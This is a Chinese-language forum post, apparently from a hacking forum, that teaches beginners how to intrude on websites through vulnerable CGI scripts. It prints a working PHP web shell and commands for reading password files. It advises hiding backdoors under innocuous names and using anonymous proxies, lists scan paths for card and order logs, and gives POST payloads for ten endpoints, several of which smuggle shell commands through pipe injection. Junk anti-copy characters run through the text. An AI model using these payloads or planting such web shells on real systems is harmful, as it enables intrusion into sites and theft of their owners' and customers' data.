CGI 脚本入侵快速上手+脚本使用方法

admin

CGI 脚本入侵快速上手+脚本使用方法
* c  i, Y2 V  a8 t  T大家好 我是bboyhip  只是一名菜菜的exploiter
2 s# d8 J1 v( A, J  l2 `7 ?$ N很开心来到贵论坛
这里让我感觉 很有技术交流的感觉
; A( s9 d9 v$ ]' D* o我会长长来玩的
前言:
( Z2 c; }! ^; v& P2 A. l3 d以下讲解针对欧美日本网站
當我們在做滲透分析的時候 方法有很多
% h% ]  J* t/ s( S7 f9 G我门都知道 国外伺服器大多是linux 平台
1 U$ O7 l4 |+ x+ q1 s所以有很多网站程序有6成都会使用cgi 脚本来管理
目录为/cgi-bin/
" p! i1 p1 q8 j
只是个人在实务上一些经验
& }1 D- [, o$ `# {写的不好 请多多见谅喔
在这里我简单分为几个部份一定要會的
讲解一下
7 j) i! Q$ |6 `3 p( `0 p& |让没有基础的人很容易上手
/ I* B" Z. N/ V% z7 A$ Z$ M
以下内容跟帖回复才能看到
7 u( N. t* @9 y8 o+ h==============================

) |4 `# d/ m; n6 _1 I- C  j. ]+ ^第1部份: 何谓Shell?
Shell的中文, 可称为 "壳".  Shell 是一个比较复杂的概念, 先看比较传统的解释:
: f4 q3 x& T# w3 RA shell is the program which reads user input from the command line and executes actions based upon that input.
意思是, 通过应用程式(shell), 用户输入指令, 由系统执行该指令.
, }& t$ L5 }6 T. M) e* R
3 e) s1 ~9 q4 H; s: x1 _对於黑客来说, shell是後门, 是入侵/ 控制/ 浏览对方系统的程式/ 方法.  
要自行建立一个shell是十分困难的, 因为要先找漏洞, 找到後, 利用该漏洞来写入档案/ 後门.  大家都知道, 有些漏洞只可加码, 有些可读档, 但可以写档的不多.  在数年前, 有一个十分流行及易用的漏洞addpasswd.cgi, 可以写後门, 但时至今日, 绝大部份的addpasswd.cgi已经被删除.
所以, 对於入门的exploiter来说, 先收集别人的後门, 多多练习, 然後再学习做自己的shell.
6 Z0 s) S) C% l0 O) a! D2 R2 s  Q
第2部份: Unix 指令
以下是一些常见及重要的指令:
$ V4 P% O) ?! C' z8 Lpwd: 显示当前目录, 即是後门/程式所在的位置
1 M5 P; M8 ]/ \7 h如 /home/www/site.com/cgi-bin/
ls: 列出档案 (-a 包含隐藏档; -l 包含详细资料).  
ls -al :详细列出档案资料(当前目录)
ls /: 列出根目录
ls /etc: 列出/etc的资料夹及档案
ls ../ -al: 详细列出上一层的资料夹及档案
cat: 显示档案内容
: B# ^8 ]( k1 w% u# O- dcat .htpasswd: 显示 .htpasswd 这个档案的内容(当前目录)
1 T5 U. J% o1 I# l0 `cat /etc/passwd: 显示 /etc/passwd 这个档案的内容
0 R2 y4 P3 J" O/ z/ pwho: 显示谁login 至系统
/ P: k) i/ t* I! Eman: 显示指令用法  
man ls: 显示ls这指令的用法  
mkdir 建立目录
6 }9 f: r5 Z1 Q7 lrmdir 删除目录
' q' @" [& B% b5 W, m6 D) z- pmv 移动档案
rm 删除档案

5 o1 T2 {- a$ e0 B第3部份: Shell的使用
例如:
http://site.com/refer.php
这是我的後门, 原代码如下:
8 z, Q) e9 O6 ^<Form Action="#" Method="POST">
7 I* X; d' k5 C8 P6 s" g2 m7 `<Input type="text" name="cmd">
<Input type="Submit">
</Form>
<?php
$cmd = $_POST['cmd'];
$Output = shell_exec($cmd);
echo $Output;
?>
" P& L5 p7 Z2 X' v( q输入pwd, 可得到绝对路径:
+ a! k  g3 c4 T- n5 @% ^/home/htdocs/users/jnesbitt/jnesbitt/nylonfantasies.com

  Y8 X' O1 D$ L第4部份: 注意事项
; e/ a. X$ P4 S! ?" l+ @: }# w- 使用匿名代理, 保障自己
6 u9 z9 z. o9 [/ {( ~- 不可恶意破坏, 或更改现有档案, 否则管理员发现了, 不但会删除後门, 可能会有追究行动
- 加後门前, 必须了解目标系统是否支援.  例如, cgi後门, 应放在cgi-bin; 有些系统可能不支援 php後门等.
- 加後门前 (如 index.php), 先检查是否已存在该档案名称, 以免覆盖原有档案, 造成破坏.
- 後门的名称, 不可使用hack, crack, exploit等字眼, 最好使用index, index1, log, login, refer, tmp, test, info等, 鱼目混珠,
不容易被发现.
; ~! d) h+ f( Z" D+ z; Q, [- 将後门放在比较隐闭的地方 (例如 /cgi-bin/内, 有很多cgi档案, 比较少php档案)
7 t2 _8 K. B9 A# `" I针对网站的渗透分析方法太多了
这篇文章的重点是cgi 脚本攻击
: Y1 {* {: @4 G! C所以我用简单的叙述形容
开始讲解脚本入侵过程:
在这里提供一些方法思路让大家学习一下
5 Y" [8 |- k9 f" A
1.一开始对一个网站进行cgi漏洞扫描
& J. `/ X4 w* M9 f9 w! V9 }  u我们需要的东西有
9 ~4 T& f5 m5 P4 _, F扫洞工具 如:triton..等等
E表
如
" Q3 F# }  u7 e1 J/cgi-bin/add-passwd.cgi
/WebShop/templates/cc.txt
) H4 I2 N* D( L. ]/Admin_files/order.log
/orders/mountain.cfg
/ b; d- t6 w+ G8 x+ M/cgi-sys/cart.pl
/scripts/cart.pl
1 v! l! |+ \& l0 k4 V2 C# h- j5 g/htbin/cart.pl
E表来源可以是网路收寻或是自己的0 day
4 d# W  t2 w2 W# I& j( h
* i7 |8 _7 O# B1 X2.怎样确认扫到的洞 是真的还假的?
举例: target: http://www.site.com/cgi-bin/add-passwd.cgi
/ K0 ^) g6 |4 [. F5 Q" o4 i一般都是在IE里先看一下的,记住这个返回码哦
ERROR:This script should be referenced with a METHOD of POST.
9 R1 V5 P) y% _' o* P0 r, P5 r# \没有返回一定是假的
/ T7 Y8 `" \2 R. _3.重来来了 很多人都会问我
- b2 `; X# T$ A/ n! X2 ?他扫到很多洞 但是不会使用
, m* ^+ m# R$ z: @# Z- N+ N因为这些漏洞 使用的语法 称为post
. h1 v) q# B/ B+ N/ ^我们要找post 的方法很多
# a4 D: N5 g6 z0 J: P' {- a" r可以是源代码分析 找出介质
或是用抓包工具 抓他的语法...等等
( C3 f! y6 V) b5 _7 y6 [
+ K7 C6 a9 r& {; Q( O$ Y以下我提供10个 cgi 洞以及使用方法post
2 h. H4 s/ A( d2 `' [$ m6 d让大家可以针对网站去做扫描  
5 t9 H( c3 J% A& J. Z' |/index.cgi
- i' z7 M( z& j6 r! owei=ren&gen=command
/passmaster.cgi
! L9 {: j; A! a: d# n! vAction=Add&Username=Username&Password=Password
/accountcreate.cgi
username=username&password=password&ref1=|echo;ls|
- Y9 u# M% j) I2 z; g2 V8 s) P/form.cgi
name=xxxx&email=email&subject=xxxx&response=|echo;ls|
/addusr.pl
/cgi-bin/EuroDebit/addusr.pl
$ v4 A8 N+ g9 X+ @% C$ _; ouser=username&pass=Password&confirm=Password
  D7 f1 f5 t. j( s3 o0 X9 Z9 X6 Q/ccbill-local.asp
7 Z' l+ ~  j" z+ K; k3 epost_values=username:password
/count.cgi
1 i+ L3 f6 b( b. d2 j  zpinfile=|echo;ls -la;exit|
/recon.cgi
# Z0 t, R3 p9 d3 p" H/recon.cgi?search
) y7 m* J+ M) F1 Hsearchoption=1&searchfor=|echo;ls -al;exit|
6 z! u: B  l, H, m5 i/verotelrum.pl
( P$ G) m) ]7 G# `vercode=username:password:dseegsow:add:amount<&30>
1 E6 [* G; {# q$ ~8 I: {. l( G/af.cgi_browser_out=|echo;ls -la;exit;|
* A- B( U# ]; V
2 [7 r4 `7 u0 H( a; _6 L1 f今天就讲到这  感谢大家支持
7 y* p3 B- J; m; d